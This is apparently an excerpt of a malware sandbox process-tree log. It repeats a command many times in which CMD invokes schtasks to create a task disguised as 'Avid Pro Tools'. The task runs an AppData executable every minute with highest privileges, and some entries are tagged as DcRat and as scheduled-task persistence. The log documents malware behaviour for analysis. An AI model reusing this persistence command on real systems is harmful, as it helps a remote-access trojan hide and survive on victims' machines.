C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2060
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:156
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2640
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2420
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2724
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2384
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2632
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2028
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1240
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1056
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2300
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2056
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1632
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2312
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:916
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2044
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1060
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2556
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:628
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2216
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1428
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2692
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:904
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2164
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3052
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1052
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2528
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2020
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1672
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1384
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2976
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2788
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2960
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2340
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2200
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2544
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1584
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1328
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2460
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2932
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1344
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2960
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2080
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1528
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2504
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:820
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:408
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1012
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2416
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3016
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1440
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1404
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1576
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3024
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2428
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1160
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:820
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1080
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2092
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1200
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1692
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2164
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2660
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2028
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2240
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:556
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:816
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2336
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1080
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2612
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1592
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1656
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2592
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1836
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1844
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2684
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2208
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1576
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2340
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1256
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2804
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1856
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2880
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1940
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1168
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2056
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2300
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2072
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2464
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2372
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1328
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2600
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:852
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2392
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1252
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:928
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2632
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1360
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:560
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1296
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1688
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1940
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1932
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2684
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1952
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1584
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1008
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:620
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2588
-
